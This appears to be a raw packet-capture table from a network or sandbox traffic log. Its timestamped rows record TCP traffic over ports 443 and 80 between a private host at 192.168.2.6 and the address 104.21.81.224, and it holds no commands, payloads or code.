Dec 29, 2024 16:07:21.099359989 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:21.893990993 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:21.894047976 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:21.894135952 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:21.894165993 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:21.894192934 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:21.894252062 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:21.899831057 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:21.899848938 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:21.900006056 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:21.900032043 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:21.904325962 CET	49735	80	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:22.025136948 CET	80	49735	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:22.251657009 CET	80	49735	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:22.251739979 CET	49735	80	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:22.255006075 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:22.255049944 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:22.255331993 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:22.256963015 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:22.256974936 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:23.516117096 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:23.516186953 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:23.516829967 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:23.516834021 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:23.517086983 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:23.517091036 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.887224913 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.887293100 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.887348890 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.887362957 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:24.887376070 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.887408972 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:24.887428999 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:24.887434006 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.887445927 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.887474060 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:24.887496948 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:24.887501955 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.887547970 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:24.895422935 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.895498037 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:24.895504951 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.895551920 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:24.906501055 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.906555891 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:24.906560898 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:24.906606913 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.008940935 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.008990049 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.008996964 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.009037971 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.088536978 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.088793993 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.092288017 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.092336893 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.092343092 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.092391968 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.100476027 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.100554943 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.100560904 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.100603104 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.108886957 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.108949900 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.108963013 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.109035969 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.116893053 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.117068052 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.125554085 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.127675056 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.127686024 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.127774000 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.133764982 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.133826971 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.133832932 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.133886099 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.133893013 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.133941889 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.141433001 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.141493082 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.141499043 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.141545057 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.149705887 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.149765968 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.156815052 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.156868935 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.156920910 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.156968117 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.163898945 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.163952112 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.163958073 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.164020061 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.171010017 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.171076059 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.171124935 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.171278000 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.178196907 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.178258896 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.185194969 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.185241938 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.289592981 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.289665937 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.289675951 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.289719105 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.292012930 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.292057037 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.292062998 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.292104006 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.296974897 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.297059059 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.306792974 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.306870937 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.312855005 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.312926054 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.316123009 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.316181898 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.325073957 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.329565048 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.331105947 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.331113100 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.331151009 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.339098930 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.339179993 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.347054005 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.347119093 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.351541996 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.351608038 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.360383987 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.360440969 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.369998932 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.370054007 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.374470949 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.374527931 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.382968903 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.383028984 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.391163111 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.391216040 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.395708084 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.395773888 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.405483961 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.405550003 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.492778063 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.492860079 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.499656916 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.499728918 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.506381989 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.506443024 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.509670019 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.509726048 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.516042948 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.516103983 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.519180059 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.519239902 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.525093079 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.525158882 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.530946970 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.530998945 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.536730051 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.536789894 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.539654016 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.539716959 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.545428991 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.545491934 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.548244953 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.548300982 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.553889990 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.553962946 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.559514046 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.559578896 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.565167904 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.565237045 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.568149090 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.568213940 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.573843002 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.573904037 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.578128099 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.578208923 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.583806992 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.584006071 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.586651087 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.586709976 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.592401028 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.592459917 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.597964048 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.598030090 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.611833096 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.611922026 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.613317013 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.613369942 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.619013071 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.619095087 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.703109026 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.703125954 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.703145981 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.703187943 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.703200102 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.703244925 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.712882996 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.712924957 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.712961912 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.712969065 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.713000059 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.713021040 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.725754023 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.725780964 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.725842953 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.725860119 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.725920916 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.736568928 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.736598015 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.736646891 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.736653090 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.736685038 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.736711979 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.744134903 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.744160891 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.744221926 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.744229078 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.744261980 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.744277000 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.751744986 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.751780987 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.751816988 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.751822948 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.751861095 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.751882076 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.758706093 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.758737087 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.758771896 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.758778095 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.758810043 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.758829117 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.778985023 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.779009104 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.779052973 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.779061079 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.779088974 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.779109001 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.897975922 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.898008108 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.898057938 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.898070097 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.898119926 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.898137093 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.904110909 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.904145002 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.904181004 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.904189110 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.904217005 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.904241085 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.911184072 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.911210060 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.911246061 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.911333084 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.911338091 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.911441088 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.918126106 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.918155909 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.918195963 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.918201923 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.918227911 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.918245077 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.924300909 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.924326897 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.924364090 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.924371004 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.924401999 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.924746037 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.931442976 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.931469917 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.931510925 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.931518078 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.931550980 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.931560993 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.938371897 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.938396931 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.938433886 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.938441038 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.938469887 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.938486099 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.980159044 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.980185986 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.980237961 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.980248928 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:25.980276108 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:25.980297089 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.099359989 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.099400997 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.099455118 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.099462986 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.099502087 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.099523067 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.105441093 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.105463028 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.105499983 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.105508089 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.105534077 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.105551958 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.112535954 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.112560987 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.112756968 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.112766027 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.113068104 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.119508982 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.119534969 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.119600058 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.119607925 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.119822979 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.125665903 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.125694036 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.125739098 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.125746965 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.125773907 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.126338005 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.132744074 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.132766008 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.132831097 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.132838964 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.133038044 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.139710903 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.139734030 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.139795065 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.139801979 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.139962912 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.181432962 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.181461096 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.181540012 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.181550980 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.181634903 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.300524950 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.300549984 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.300611973 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.300621986 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.300649881 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.300661087 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.307446957 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.307467937 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.307540894 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.307548046 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.307616949 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.314522028 CET	443	49750	104.21.81.224	192.168.2.6
